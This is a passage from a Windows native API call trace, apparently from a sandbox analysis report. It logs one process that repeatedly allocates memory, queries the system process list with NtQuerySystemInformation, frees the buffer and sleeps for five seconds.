BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.557] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.617] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.726] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.728] NtQuerySystemInformation (in: 